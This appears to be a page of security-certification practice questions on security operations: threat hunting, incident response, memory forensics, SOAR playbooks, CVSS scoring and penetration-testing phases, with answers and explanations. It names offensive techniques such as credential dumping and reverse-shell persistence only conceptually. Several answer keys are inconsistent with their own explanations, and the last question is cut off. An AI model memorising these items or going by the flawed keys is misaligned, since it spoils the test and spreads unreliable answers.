CCNA Casp Security Operations Questions

72 of 147 questions · Page 2/2 · Casp Security Operations topic · Answers revealed

76
Multi-Selecthard

A threat intelligence analyst is profiling a threat actor that has been targeting the energy sector. Which THREE of the following attributes are most important to include in a threat actor profile? Select THREE.

Select 3 answers
A.Vulnerabilities exploited (CVEs)
B.Motivations and objectives
C.Targeted industries and regions
D.Tactics, Techniques, and Procedures (TTPs)
E.List of known indicators of compromise (IOCs)
AnswersB, C, D

Understanding why they attack helps predict future behavior.

Why this answer

Key attributes include motivations (e.g., espionage), TTPs (tactics, techniques, procedures), and targeted sectors. IOCs and CVEs are important but may change frequently; motivations, TTPs, and sectors are more stable.

77
MCQmedium

An organization is deploying deception technology to detect lateral movement by attackers. Which of the following would be the most effective to detect an attacker who has gained access to the internal network and is attempting to move to a sensitive server?

A.A honeytoken in the form of a fake password file on a file server
B.A network-based intrusion detection system (NIDS) on the segment
C.A honeypot configured to mimic a high-value database server
D.An endpoint detection and response (EDR) agent on all workstations
AnswerA

Honeytokens like fake credentials are effective because they trigger alerts when an attacker attempts to use them for authentication.

Why this answer

Honeytokens are deceptive data (e.g., fake credentials) placed on systems; if an attacker uses them, it triggers an alert. This is effective for detecting lateral movement without requiring interaction with a full honeypot.

78
MCQmedium

A SOC analyst is investigating an alert from the EDR system indicating that a user's workstation made multiple failed login attempts to a sensitive server, followed by a successful login from an unusual IP address. The analyst suspects a brute force attack. Which type of threat hunting methodology is being used?

A.Hypothesis-driven hunting
B.TTP-driven hunting
C.IoC-driven hunting
D.Baseline-driven hunting
AnswerA

The analyst formed a hypothesis based on an alert and is investigating.

Why this answer

This is hypothesis-driven threat hunting, as the analyst starts with a hypothesis (brute force attack) and then searches for evidence to confirm or deny it based on the alert.

79
MCQeasy

During a security incident, the incident response team has identified the root cause and removed the threat from all affected systems. Which phase of the incident response lifecycle involves returning systems to normal operation and monitoring for any signs of recurrence?

A.Eradication
B.Containment
C.Recovery
D.Lessons Learned
AnswerC

Recovery restores systems and monitors for recurrence.

Why this answer

The incident response lifecycle includes preparation, detection, containment, eradication, recovery, and lessons learned. Recovery is the phase where systems are restored to normal operation and monitoring is implemented to ensure the threat does not return.

80
MCQmedium

A security operations center (SOC) analyst is investigating a potential malware infection on a workstation. The analyst wants to perform static analysis on a suspicious executable. Which tool or technique is most appropriate for examining the executable without executing it?

A.Run the executable in a sandbox
B.Use a memory forensics tool like Volatility
C.Use the strings command to extract readable ASCII and Unicode strings
D.Perform a network traffic capture
AnswerC

Strings is a common static analysis tool for extracting embedded text from binaries.

Why this answer

Static analysis involves examining the file without running it. Using a disassembler like IDA Pro or a tool to view strings and PE headers is typical. Strings utility extracts readable text from the binary, which can reveal clues about its functionality.

81
MCQmedium

A security analyst is tuning the SIEM and wants to create a correlation rule that detects potential lateral movement using pass-the-hash attacks. Which log sources are most essential for detecting this technique?

A.DNS logs and web proxy logs
B.Windows Security Event Logs (4624) and network flow logs
C.Application logs and antivirus logs
D.DHCP logs and VPN logs
AnswerB

These logs show authentication attempts and network connections.

Why this answer

Pass-the-hash attacks often use Windows authentication logs (Event ID 4624) and network logs for unusual remote connections. Windows Security Event Logs and network logs are key.

82
MCQhard

A SOC analyst is investigating a suspicious process that is making outbound connections to an unknown IP address. The analyst wants to examine the process memory for injected code. Which Volatility plugin is most appropriate for detecting code injection by listing all Virtual Address Descriptors (VADs) that are mapped as executable and writable?

A.netscan
B.malfind
C.pslist
D.dlllist
AnswerB

malfind detects injected code by examining VADs.

Why this answer

Volatility's 'malfind' plugin scans VADs and looks for executable and writable pages that may indicate injected code. It is commonly used for detecting code injection.

83
MCQeasy

Which of the following is the primary advantage of using STIX and TAXII for threat intelligence sharing?

A.They replace the need for a SIEM system
B.They perform dynamic analysis of malware samples
C.They provide real-time blocking of malicious IPs
D.They allow automated sharing of threat intelligence in a standardized format
AnswerD

Standardization and automation are key benefits.

Why this answer

STIX (Structured Threat Information Expression) and TAXII (Trusted Automated Exchange of Intelligence Information) provide a standardized framework for representing and exchanging threat intelligence, enabling interoperability between different tools and organizations.

84
MCQmedium

A security team is evaluating an EDR solution. Which of the following capabilities is a primary differentiator between EDR and traditional antivirus?

A.Centralized policy management
B.File integrity monitoring
C.Signature-based detection of known malware
D.Behavioral analysis and detection
AnswerD

Behavioral analysis is a key EDR capability, allowing detection of novel threats.

Why this answer

EDR focuses on continuous monitoring and recording of endpoint activities, enabling detection of suspicious behaviors that may indicate an attack, even if no known signature exists. Traditional antivirus relies on signature-based detection. Behavior-based detection is a core EDR capability.

85
MCQeasy

An organization wants to deploy a technology that lures attackers into a controlled environment to observe their tactics, techniques, and procedures (TTPs). Which deception technology should the organization implement?

A.Honeytoken
B.EDR
C.Honeypot
D.SIEM
AnswerC

Honeypots are decoy systems that mimic real assets to lure attackers.

Why this answer

A honeypot is a decoy system designed to attract attackers and gather intelligence.

86
MCQmedium

A vulnerability scanner reports a critical vulnerability with a CVSS base score of 9.8 on a public-facing web server. However, the server has a compensating control: a Web Application Firewall (WAF) that blocks exploit attempts. How should the security team prioritize patching this vulnerability?

A.Schedule patching during the next maintenance window
B.Defer patching indefinitely since the WAF mitigates the risk
C.Immediately patch the vulnerability as soon as possible
D.Increase the WAF rule strictness and delay patching
AnswerC

Critical vulnerabilities require immediate patching despite compensating controls.

Why this answer

Compensating controls can reduce risk, but patching should still be prioritized for critical vulnerabilities even if compensating controls are in place, as controls can be bypassed.

87
MCQmedium

A threat hunter is looking for signs of a ransomware attack that encrypts files and drops a ransom note. The hunter decides to search for processes that have modified many files in a short period. Which threat hunting methodology is being used?

A.TTP-driven hunting
B.Hypothesis-driven hunting
C.Machine learning-driven hunting
D.IoC-driven hunting
AnswerB

The hunter forms a hypothesis about ransomware behavior and searches for it.

Why this answer

Hypothesis-driven hunting starts with a hypothesis about a threat and then searches for evidence. The hunter is hypothesizing about ransomware behavior.

88
MCQmedium

A penetration tester is performing a test against a web application. During active reconnaissance, the tester discovers that the application discloses version numbers in HTTP headers. Which phase of the penetration testing lifecycle does this activity belong to?

A.Reconnaissance
B.Post-exploitation
C.Exploitation
D.Reporting
AnswerA

Active reconnaissance is part of the reconnaissance phase, where the tester gathers information directly from the target.

Why this answer

Active reconnaissance involves directly interacting with the target to gather information, such as by sending probes and analyzing responses. Discovering version numbers via HTTP headers is a form of active reconnaissance because the tester is making requests and inferring information from the responses.

89
MCQmedium

A security analyst is reviewing a suspicious email reported by a user. The email contains an attachment named 'invoice.pdf.exe'. Which type of malware analysis technique should the analyst perform first to determine if the file is malicious?

A.Reverse engineering
B.Static analysis
C.Dynamic analysis in a sandbox
D.Memory forensics
AnswerB

Static analysis is quick and safe to identify malicious characteristics without execution.

Why this answer

Static analysis (e.g., checking file extensions, strings, and hashes) is non-executing and safe to perform first to gather initial indicators.

90
Multi-Selecthard

A security engineer is reviewing the results of a penetration test. The tester successfully exploited a vulnerability in a web application and escalated privileges to domain admin. Which THREE of the following findings should be included in the technical report to provide actionable remediation steps? (Select THREE.)

Select 3 answers
A.The estimated financial loss from the exploit
B.The recommendation to patch the web application
C.The exact command used to exploit the vulnerability
D.The name and contact of the penetration tester
E.The step-by-step path from initial access to domain admin
AnswersB, C, E

Actionable remediation is required in the technical findings.

Why this answer

The technical report should include specific recommendations (patch, input validation), evidence (command used), and impact (privilege escalation path). The business impact belongs in the executive summary.

91
MCQmedium

A vulnerability management team is prioritizing patches for a set of critical vulnerabilities. Vulnerability A has a CVSS base score of 9.8, vulnerability B has a CVSS base score of 7.5, and vulnerability C has a CVSS base score of 8.2. However, vulnerability B is actively being exploited in the wild, while the others are not. Which vulnerability should be patched first according to best practices?

A.All three should be patched simultaneously
B.Vulnerability B because it is actively exploited
C.Vulnerability C because it has a higher base score than B
D.Vulnerability A because it has the highest base score
AnswerB

Active exploitation increases the vulnerability's temporal score and priority.

Why this answer

While CVSS base score is important, temporal factors like active exploitation increase risk. Vulnerability B, despite a lower base score, is being exploited and thus poses a more immediate threat. Patching should prioritize actively exploited vulnerabilities.

92
MCQhard

An analyst is examining a memory dump with Volatility and finds a suspicious process that has no parent process (parent PID 0). Which technique is the malware likely using to hide?

A.Rootkit
B.DLL injection
C.Process hollowing
D.WMI persistence
AnswerC

Process hollowing can result in a process with no parent.

Why this answer

Process hollowing replaces the memory of a legitimate process with malicious code. The parent PID 0 indicates that the process was spawned by the kernel, which can occur after hollowing.

93
MCQeasy

Which of the following is a key benefit of using an Extended Detection and Response (XDR) solution over traditional Endpoint Detection and Response (EDR)?

A.XDR only works with a single vendor's products
B.XDR eliminates the need for SIEM and SOAR systems
C.XDR only focuses on network traffic analysis
D.XDR provides centralized visibility across multiple security layers including endpoints, network, and cloud
AnswerD

XDR integrates data from various sources for holistic detection and response.

Why this answer

XDR extends detection beyond endpoints to include network, email, cloud, and other data sources, providing broader visibility and correlation across the entire environment.

94
MCQeasy

Which of the following is the primary purpose of a honeypot in a security operations environment?

A.To encrypt sensitive data at rest
B.To replace the need for traditional firewalls
C.To block malicious traffic at the network perimeter
D.To provide early detection of unauthorized activity
AnswerD

Honeypots detect attackers by luring them.

Why this answer

Honeypots are decoy systems designed to attract attackers, allowing security teams to observe their tactics, techniques, and procedures without risking real assets.

95
MCQmedium

A security analyst receives an alert from the SIEM indicating multiple failed logon attempts from an external IP address followed by a successful logon for a domain admin account. Which phase of the incident response lifecycle is the analyst currently in?

A.Lessons learned
B.Containment
C.Detection
D.Preparation
AnswerC

The alert is part of the detection phase where potential incidents are identified.

Why this answer

The detection phase involves identifying potential incidents through alerts and analysis. The analyst has received an alert and is likely investigating, which is part of detection.

96
MCQmedium

During a digital forensics investigation, an analyst needs to acquire the contents of RAM from a compromised server. Which order of volatility should the analyst follow?

A.Capture the swap file first, then RAM
B.Capture network connections first, then RAM
C.Capture the hard drive image first, then RAM
D.Capture RAM first, then the hard drive
AnswerD

RAM is the most volatile and should be collected first.

Why this answer

The order of volatility dictates collecting the most volatile data first. RAM is highly volatile and should be captured before less volatile data like disks.

97
MCQmedium

A SOC team is implementing a SOAR playbook to automate response to phishing emails reported by users. Which step should be included in the playbook to prevent other users from accessing the malicious link?

A.Isolate the reporter's workstation
B.Reset the reporter's password
C.Block the malicious URL in the web proxy
D.Delete the email from all mailboxes
AnswerC

Blocking the URL prevents access by all users.

Why this answer

URL blocking in a web proxy prevents other users from accessing the malicious link, which is a common automated response in phishing playbooks.

98
MCQmedium

An organization discovers a critical vulnerability in a legacy application that cannot be patched due to vendor end-of-life. Which of the following is the BEST compensating control to reduce risk?

A.Increase logging and monitoring
B.Apply a virtual patch using an intrusion prevention system (IPS)
C.Implement network segmentation to isolate the application
D.Decommission the application immediately
AnswerC

Segmentation limits exposure and protects the rest of the network.

Why this answer

Network segmentation isolates the vulnerable system, reducing the attack surface and limiting potential damage.

99
MCQhard

A security analyst is investigating a malware sample and wants to determine its capabilities without executing it. The analyst examines the binary's imports, strings, and structure. What type of analysis is being performed?

A.Memory analysis
B.Static analysis
C.Reverse engineering
D.Dynamic analysis
AnswerB

Static analysis is performed without executing the file.

Why this answer

Static analysis examines the malware without executing it, focusing on file metadata, strings, imports, and other characteristics.

100
Multi-Selecteasy

A security analyst is reviewing CVSS scores for vulnerability prioritization. Which TWO of the following are component metric groups in CVSS v3?

Select 2 answers
A.Impact
B.Temporal
C.Exploitability
D.Environmental
E.Attack Vector
AnswersB, D

Temporal is one of the three metric groups.

Why this answer

CVSS v3 consists of Base, Temporal, and Environmental metric groups. Exploitability and Impact are sub-scores within the Base group, not separate groups.

101
MCQmedium

During a penetration test, the tester has gained initial access to a web server and wants to move laterally to a database server. Which of the following techniques would be most effective for identifying valid credentials that could be reused on the database server?

A.Running a port scan on the internal network
B.Deploying a web shell for persistent access
C.Conducting a SQL injection on the database server
D.Using Mimikatz to dump credentials from memory
AnswerD

Mimikatz extracts credentials that may be reused.

Why this answer

Mimikatz is a tool that extracts plaintext passwords, hashes, and Kerberos tickets from memory. It is commonly used for credential dumping to enable lateral movement.

102
MCQmedium

A security analyst is reviewing a suspicious process that has been identified on an endpoint. The analyst wants to determine if the process has any network connections and what data it might be sending. Which tool is most appropriate for analyzing the memory of the affected system to identify network connections and potential data exfiltration?

A.Wireshark
B.Volatility
C.Autopsy
D.Nmap
AnswerB

Volatility is used for memory forensics and can extract network connections and other runtime artifacts.

Why this answer

Volatility is a memory forensics tool that can analyze RAM dumps to extract network connections, processes, and other artifacts. It is the best choice for this task.

103
MCQhard

A security analyst is analyzing a memory dump using Volatility. The analyst wants to list all running processes and identify any hidden processes. Which Volatility plugin should be used?

A.psxview
B.pslist
C.pstree
D.psscan
AnswerD

psscan scans for processes in memory pools and can detect hidden or terminated processes.

Why this answer

The pslist plugin lists processes from the doubly linked list, while psscan uses pool tag scanning to find hidden processes that are not in the linked list.

104
MCQmedium

A penetration tester is performing a test against a web application. The rules of engagement prohibit any denial of service (DoS) attacks. Which of the following actions is most likely prohibited by this restriction?

A.Performing a SQL injection that deletes a table
B.Exploiting a file upload vulnerability to upload a web shell
C.Using a tool to send thousands of requests to overwhelm the server
D.Running a directory brute-force tool
AnswerC

Overwhelming the server is a DoS attack, explicitly prohibited.

Why this answer

A SQL injection that causes a database crash constitutes a denial of service, which is prohibited.

105
Multi-Selectmedium

A penetration tester is preparing for an engagement and must define the rules of engagement (ROE) with the client. Which TWO of the following should be included in the ROE? Select TWO.

Select 2 answers
A.Time window for testing (e.g., after hours)
B.Scope of testing (IP ranges and systems)
C.List of vulnerabilities to be tested
D.Testing credentials provided by the client
E.Vendor contact information
AnswersA, B

Specifies when testing can occur to minimize impact.

Why this answer

Rules of engagement should include scope (IP ranges, systems), limitations (what is off-limits), and authorization. Testing credentials and vulnerability details are not part of ROE.

106
MCQeasy

A security analyst is performing incident response and needs to collect evidence from a live system. Which of the following should be collected first to preserve volatile data?

A.Memory (RAM)
B.Network connections
C.Hard drive contents
D.System logs
AnswerA

Memory is the most volatile and must be captured first.

Why this answer

The order of volatility dictates that memory (RAM) is the most volatile and must be captured before any other evidence.

107
MCQeasy

A security analyst is investigating a potential malware infection on a user's workstation. The analyst wants to examine the file system for any suspicious files without altering the original data. Which forensic principle is the analyst following?

A.Chain of custody
B.Hashing
C.Order of volatility
D.Forensic imaging
AnswerA

Chain of custody documents the handling of evidence to maintain its integrity.

Why this answer

Preserving the chain of custody ensures that evidence is not tampered with and maintains its integrity for legal proceedings.

108
MCQhard

A security analyst is investigating a potential advanced persistent threat (APT) that has evaded traditional signature-based defenses. The analyst hypothesizes that the attacker is using a specific technique from the MITRE ATT&CK framework: process injection. Which threat hunting methodology is most appropriate for this scenario?

A.TTP-driven hunting by analyzing adversary behaviors mapped to the ATT&CK framework
B.Hypothesis-driven hunting based on a specific technique (process injection) and searching for evidence in memory and process activity
C.Automated hunting using SIEM correlation rules that trigger on known malicious file hashes
D.IoC-driven hunting using known indicators of compromise from open-source feeds
AnswerB

Hypothesis-driven hunting starts with a hypothesis about adversary behavior and proactively searches for evidence, making it ideal for detecting novel or evasive techniques.

Why this answer

Hypothesis-driven hunting starts with a specific hypothesis based on threat intelligence or a known TTP, such as process injection. This approach is proactive and focuses on detecting behaviors consistent with the hypothesis, unlike IoC-driven hunting which relies on known indicators.

109
MCQhard

A security analyst is using a SOAR platform to automate response to phishing emails reported by users. The playbook should perform the following actions in order: (1) extract indicators from the email, (2) query threat intelligence feeds for reputation, (3) if malicious, block the sender's domain at the email gateway and delete the email from all user inboxes. Which type of playbook step is most appropriate for step 3?

A.Playbook trigger
B.Output step
C.Action step
D.Conditional step
AnswerC

Action steps execute automated tasks such as API calls to block or delete.

Why this answer

In SOAR, an action step performs a specific operation like blocking a domain or deleting emails. Conditional steps would check conditions, but the playbook already determined the email is malicious, so an action is needed.

110
MCQhard

A security team is analyzing a suspicious binary using static analysis. They run the strings command and observe references to 'CreateRemoteThread' and 'WriteProcessMemory'. Which technique is the binary likely employing?

A.DLL sideloading
B.Reflective DLL loading
C.Process injection
D.API hooking
AnswerC

These API calls are typical of process injection techniques.

Why this answer

CreateRemoteThread and WriteProcessMemory are commonly used for process injection, allowing code execution in another process's address space.

111
Multi-Selecteasy

A penetration tester is planning a test for a client that has a critical web application. The rules of engagement specify that the tester must avoid causing a denial of service (DoS). Which THREE actions are appropriate for the tester to include in the scope? (Select THREE.)

Select 3 answers
A.Conducting social engineering attacks against employees without prior approval
B.Port scanning to identify open services on the web server
C.Performing a distributed denial-of-service (DDoS) attack to test resilience
D.Attempting to brute-force directories and files on the web server
E.Testing for SQL injection vulnerabilities in input fields
AnswersB, D, E

Port scanning is a standard reconnaissance technique that does not cause DoS.

Why this answer

Port scanning, SQL injection testing, and directory brute-forcing are common penetration testing activities that do not inherently cause DoS. DoS attacks and social engineering without approval are typically out of scope.

112
MCQhard

A security operations center (SOC) analyst is tuning a SIEM correlation rule to detect a known attack pattern that involves multiple failed logins followed by a successful login from a different IP address. Which approach best reduces false positives while maintaining detection effectiveness?

A.Use User Behavior Analytics (UBA) to baseline normal login patterns
B.Create a rule that alerts on any failed login
C.Correlate only with known malicious IP addresses
D.Set a threshold of 10 failed logins within 5 minutes
AnswerA

UBA adapts to user behavior, reducing false positives.

Why this answer

UBA establishes a baseline of user behavior and flags deviations, reducing false positives from legitimate multiple failed logins (e.g., forgotten passwords) while still detecting anomalous patterns.

113
MCQmedium

During an incident response, a security analyst identifies a previously unknown malware variant. Which type of threat intelligence feed would provide the most timely and structured information about this threat?

A.STIX/TAXII feed
B.An ISAC
C.Open source intelligence (OSINT)
D.A commercial threat feed
AnswerA

STIX/TAXII provides structured, machine-readable threat intelligence.

Why this answer

STIX/TAXII enables sharing of structured threat intelligence in a standardized format, allowing for automated consumption and immediate updates.

114
MCQhard

A security engineer is implementing deception technology to detect lateral movement by adversaries. Which type of deception resource would be MOST effective for capturing adversary credential harvesting activities on a network segment that contains no real domain controllers?

A.A SIEM correlation rule for anomalous logins
B.A network-based intrusion detection system (NIDS)
C.A honeypot configured as a domain controller
D.A honeytoken in the form of a fake service account password
AnswerD

Honeytokens are lightweight and trigger alerts when used.

Why this answer

A honeytoken (e.g., a fake credential file or a service account password) planted on a system can trigger an alert when an adversary attempts to use it. A fake domain controller honeypot is also effective but may require more resources. However, a honeytoken is specifically designed to be used by attackers and is simple to deploy.

115
MCQmedium

During a security incident, a SOC analyst identifies a process with a suspicious hash on several endpoints. The analyst wants to determine if this hash is known to be malicious by querying internal and external threat intelligence sources. Which standard should the analyst use to structure the threat intelligence data for automated sharing?

A.TAXII
B.STIX
C.OpenIOC
D.CybOX
AnswerB

STIX is the standard structured language for describing threat intelligence.

Why this answer

STIX (Structured Threat Information Expression) is a language for describing threat intelligence, often used in conjunction with TAXII for sharing. It structures data like indicators, observables, and campaigns.

116
MCQeasy

A security analyst is reviewing a SIEM alert that indicates a user's credentials were used to log in from two different countries within a span of 10 minutes. This is likely an indicator of what type of attack?

A.Brute-force attack
B.Man-in-the-middle attack
C.Credential theft and reuse
D.Pass-the-hash attack
AnswerC

The attacker is using stolen credentials from a different location.

Why this answer

A login from two distant locations in a short time suggests credential theft and reuse, which is characteristic of a credential stuffing or account takeover attack. The attacker likely obtained the credentials and is using them from a different location.

117
MCQmedium

A vulnerability has a CVSS base score of 9.8. The vulnerability is present on a server that is not exposed to the internet but is accessible to internal users with valid credentials. Which CVSS metric should be adjusted to reflect the reduced risk?

A.None, the base score should be used as-is
B.Temporal score
C.Environmental score
D.Base score
AnswerC

Environmental score adjusts for local context, such as access restrictions.

Why this answer

The Environmental Score allows customization based on specific organizational context, such as modified access requirements.

118
Multi-Selectmedium

A SOC team is implementing a SOAR playbook to automate the response to phishing emails reported by users. The playbook should perform initial triage and, if the email is determined to be malicious, take containment actions. Which TWO of the following actions should be included in the playbook? (Choose TWO.)

Select 2 answers
A.Send an alert to the user's manager for approval
B.Automatically create a ticket in the service desk system
C.Automatically block the sender's email address in the email gateway
D.Initiate a full antivirus scan on the user's workstation
E.Extract embedded URLs and file hashes for threat intelligence lookup
AnswersC, E

This is a containment action to prevent further emails from that sender.

Why this answer

Common phishing response playbooks include extracting URLs and hashes for analysis and automatically blocking the sender's email address. Creating a ticket is not a containment action, and scanning the user's machine may be part of eradication but not initial containment.

119
Multi-Selectmedium

A security analyst is investigating a potential data exfiltration incident. The analyst needs to preserve evidence for legal proceedings. Which two actions must the analyst take to maintain the chain of custody? (Select TWO).

Select 2 answers
A.Encrypt the evidence with a personal key
B.Share the evidence with all team members for analysis
C.Document every person who accesses the evidence and the time of access
D.Run antivirus scans on the evidence to ensure it is safe
E.Create a forensic image of the hard drive using a write-blocker
AnswersC, E

Chain of custody requires a record of evidence handling.

Why this answer

Documenting who handled evidence and when, and using forensic imaging with write-blockers ensures integrity and admissibility.

120
MCQeasy

An organization is developing a SOAR playbook to handle phishing emails reported by users. Which of the following actions is most appropriate to automate in the first step of the playbook?

A.Block the sender's email address at the gateway
B.Remove the email from all user mailboxes
C.Scan the attachment in a sandbox
D.Send an alert to the SOC analyst for manual analysis
AnswerB

Removing the email from mailboxes is a containment action that limits further risk.

Why this answer

The first step in a phishing response playbook should isolate the potentially malicious email to prevent further exposure. Automating the removal of the email from all user mailboxes is a common initial containment action.

121
MCQmedium

During a penetration test, the tester has gained initial access to a system and wants to escalate privileges. Which of the following techniques is most likely to be effective for privilege escalation on a Windows system?

A.Using Mimikatz to extract plaintext passwords from memory
B.Exploiting a local privilege escalation vulnerability like CVE-2023-xxxx
C.Scanning for open ports on the network
D.Performing a phishing attack on the domain administrator
AnswerB

Local exploits can elevate from user to admin/system.

Why this answer

Exploiting a kernel vulnerability or a misconfigured service is a common privilege escalation technique. Token manipulation and DLL hijacking are also methods, but kernel exploits are direct.

122
Multi-Selecthard

During a penetration test, the tester has gained initial access to a web server and wants to perform lateral movement to reach a database server. The tester enumerates the network and finds that the web server has two network interfaces: one connected to a DMZ and one to an internal network. The database server is on the internal network. Which TWO techniques could the tester use to pivot from the web server to the database server? (Choose TWO.)

Select 2 answers
A.Use SSH tunneling to create a local forward to the database server's port
B.Perform a SQL injection attack against the database server
C.Deploy a reverse shell from the web server to the tester's machine
D.Install a keylogger on the web server to capture database credentials
E.Use Metasploit's route add command to add a route to the internal subnet through the web server
AnswersA, E

SSH tunneling can forward local ports to internal services.

Why this answer

Pivoting techniques include using the compromised host as a proxy to route traffic and port forwarding to tunnel to internal systems. SSH tunneling and Metasploit's pivot module are common. A reverse shell is for initial access, not pivoting.

SQL injection is for initial compromise, not lateral movement.

123
MCQmedium

A security analyst is reviewing CVSS scores for vulnerabilities in the environment. A vulnerability has a base score of 9.0, but the organization has a compensating control that reduces the likelihood of exploitation. The analyst adjusts the score to 6.0 for prioritization. Which CVSS metric group did the analyst modify?

A.Base
B.Vector
C.Environmental
D.Temporal
AnswerC

Environmental metrics adjust for local controls and asset criticality.

Why this answer

The environmental score allows customization based on the organization's environment, including compensating controls.

124
Multi-Selecthard

A security analyst is investigating a potential advanced persistent threat (APT) that has been evading traditional detection. The analyst decides to use User and Entity Behavior Analytics (UEBA) to identify anomalous activity. Which TWO of the following activities would be most indicative of a potential compromise when analyzed through UEBA? (Choose TWO.)

Select 2 answers
A.A service account authenticating to a database server every 5 minutes
B.A user logging in from a remote location at 3:00 AM, which is outside their normal working hours
C.A user accessing a large number of files on a file server that they do not normally access
D.A user connecting to the corporate VPN from a hotel during a business trip
E.An administrator running a scheduled antivirus scan on a server
AnswersB, C

Off-hours access is a common indicator of compromise.

Why this answer

UEBA detects deviations from normal behavior. A user logging in at unusual hours and accessing large volumes of data are common anomalies. Running scheduled antivirus scans and normal VPN access are expected behaviors.

125
Multi-Selecthard

A senior security architect is designing a detection strategy for advanced persistent threats (APTs) that employ living-off-the-land (LotL) techniques. Which THREE of the following approaches are most effective for detecting LotL activities? (Choose three.)

Select 3 answers
A.User and Entity Behavior Analytics (UEBA)
B.Deploying honeytokens and honeypots
C.Signature-based detection on malicious file hashes
D.Monitoring for native tool usage with EDR and logging command-line arguments
E.Blocking all scripts and macros by default
AnswersA, B, D

UEBA can establish baselines and detect deviations, such as an admin using PowerShell in an unusual way.

Why this answer

LotL attackers use legitimate tools to avoid detection. Behavioral analytics can detect unusual usage patterns of native tools. Deception technologies can lure attackers into revealing themselves.

Endpoint detection and response (EDR) that monitors process behavior can detect anomalies like PowerShell executing scripts from unusual locations.

126
Multi-Selecteasy

A security team is evaluating endpoint detection and response (EDR) solutions. They want a solution that can detect fileless malware and malicious PowerShell scripts. Which TWO capabilities should the team prioritize? (Choose TWO.)

Select 2 answers
A.Signature-based detection of known malware
B.Network traffic analysis for C2 communication
C.Behavioral monitoring of script execution (e.g., PowerShell)
D.Automated firewall rule creation
E.Memory scanning capabilities
AnswersC, E

Monitoring script behavior can detect malicious activities.

Why this answer

Fileless malware often lives in memory and uses scripting. Memory scanning and script monitoring are key. Signature-based detection may miss fileless attacks.

Firewall rules are unrelated.

127
MCQeasy

A security analyst is collecting evidence from a compromised workstation. Which of the following should be collected first to preserve volatile data?

A.Memory dump
B.Hard drive image
C.Network capture
D.Event logs
AnswerA

Memory is volatile and must be captured before power loss.

Why this answer

Volatile data includes memory contents, network connections, and running processes. Memory is the most volatile and should be captured first.

128
MCQmedium

An organization wants to detect and respond to advanced threats that may evade traditional endpoint security solutions. They deploy an EDR solution that provides real-time visibility into endpoint activities. However, the security team is overwhelmed by alerts. Which technology can be integrated with EDR to automate response actions and reduce alert fatigue?

A.SIEM with correlation rules
B.Network traffic analysis (NTA)
C.Deception technology
D.SOAR platform
AnswerD

SOAR orchestrates and automates response workflows.

Why this answer

SOAR platforms ingest alerts from various sources (including EDR) and use playbooks to automate incident response actions, such as isolating a host or blocking an IP. This reduces manual effort and alert fatigue.

129
MCQmedium

A penetration tester is in the post-exploitation phase and wants to maintain access to a compromised system. Which of the following techniques is most effective for establishing persistent access while evading detection?

A.Uploading a web shell to a publicly accessible directory
B.Creating a new local user account with administrative privileges
C.Installing a rogue certificate authority
D.Creating a scheduled task that executes a reverse shell
AnswerD

Scheduled tasks can be used for persistence and are less monitored.

Why this answer

Creating a scheduled task that executes a backdoor is a common persistence mechanism. It can be disguised and runs at system startup or on a schedule, making it harder to detect.

130
Multi-Selectmedium

A SOC analyst is investigating a potential data exfiltration incident. The analyst suspects that an insider is using encrypted tunnels to transfer data. Which TWO of the following network traffic analysis (NTA) indicators are most likely to suggest encrypted exfiltration? (Choose two.)

Select 2 answers
A.Large data transfers to an external IP address during non-business hours
B.Multiple HTTP GET requests to a known content delivery network
C.A single large file upload to a cloud storage provider during work hours
D.Repeated connections to an external host on a non-standard port using TLS
E.High volumes of DNS queries to a single external domain
AnswersA, D

Encrypted exfiltration often occurs outside business hours to avoid detection, and large transfers are a key indicator.

Why this answer

Unusual volumes of traffic to a single external IP, especially during off-hours, can indicate data exfiltration. Repeated connections to an external host using non-standard ports, even if encrypted, are suspicious because they may bypass security controls. DNS tunneling is detectable by high volumes of DNS queries to a single domain, but that is separate.

131
MCQmedium

During a penetration test, the tester has gained initial access to a network and now aims to move laterally to a sensitive database server. Which phase of the penetration testing lifecycle does this activity represent?

A.Exploitation
B.Post-exploitation
C.Reporting
D.Reconnaissance
AnswerA

Lateral movement is part of exploitation.

Why this answer

Lateral movement occurs during the exploitation phase, specifically after initial access, as the attacker moves through the network.

132
MCQmedium

A security analyst is conducting a threat hunt based on the hypothesis that an adversary may have used PowerShell to execute malicious scripts. Which threat hunting methodology is being employed?

A.IoC-driven hunting
B.TTP-driven hunting
C.Baseline-driven hunting
D.Hypothesis-driven hunting
AnswerD

The hunt begins with a hypothesis about specific adversary behavior.

Why this answer

Hypothesis-driven hunting starts with a hypothesis about potential adversary behavior, then searches for evidence. The analyst is hypothesizing that PowerShell was abused.

133
MCQhard

An organization's vulnerability management team discovers a critical vulnerability in a legacy application that cannot be patched because the vendor no longer supports it. The application is essential for business operations. Which of the following compensating controls would best reduce the risk of exploitation while maintaining functionality?

A.Apply a virtual patch using a web application firewall (WAF) rule
B.Implement network segmentation and restrict access to the application
C.Disable the application until a replacement is found
D.Increase monitoring of the application without any access restrictions
AnswerB

Segmentation limits exposure and reduces risk.

Why this answer

Network segmentation with strict firewall rules isolating the legacy application limits the attack surface and prevents lateral movement from compromised hosts. This is an effective compensating control when patching is not possible.

134
MCQeasy

An organization deploys honeypots to detect attackers. Which type of deception technology is being used?

A.Honeytokens
B.Bait networks
C.Honeypots
D.Honeynets
AnswerC

Honeypots are decoy systems used for deception.

Why this answer

Honeypots are decoy systems designed to lure attackers and detect unauthorized activity.

135
MCQhard

A security analyst is investigating a potential data exfiltration incident. The analyst has collected a memory dump from the affected server. Which Volatility command should the analyst use to extract the contents of the clipboard, which may contain copied sensitive data?

A.volatility -f dump.raw clipboards
B.volatility -f dump.raw windows.clipboard
C.volatility -f dump.raw clipboard
D.volatility -f dump.raw memdump --pid 1234
AnswerC

Correct command to extract clipboard contents.

Why this answer

The 'clipboard' plugin in Volatility extracts the contents of the Windows clipboard, which can contain copied text, including passwords or sensitive data.

136
Multi-Selectmedium

A penetration tester is performing reconnaissance against a target. Which TWO of the following are examples of active reconnaissance? (Select TWO.)

Select 2 answers
A.Banner grabbing
B.Social media profiling
C.Port scanning
D.WHOIS lookup
E.Searching job postings for technology details
AnswersA, C

Banner grabbing connects to services to read banners.

Why this answer

Active reconnaissance involves direct interaction with the target. Port scanning and banner grabbing are active; OSINT and WHOIS lookups are passive (no direct interaction).

137
Multi-Selecthard

During an incident response, a forensic examiner is collecting evidence from a compromised Windows workstation. The examiner must follow proper order of volatility to preserve potential evidence. Which THREE of the following items should be collected first, before the others? (Choose THREE.)

Select 3 answers
A.Master File Table (MFT) from the hard drive
B.Event logs from the Security log
C.List of active network connections
D.List of running processes
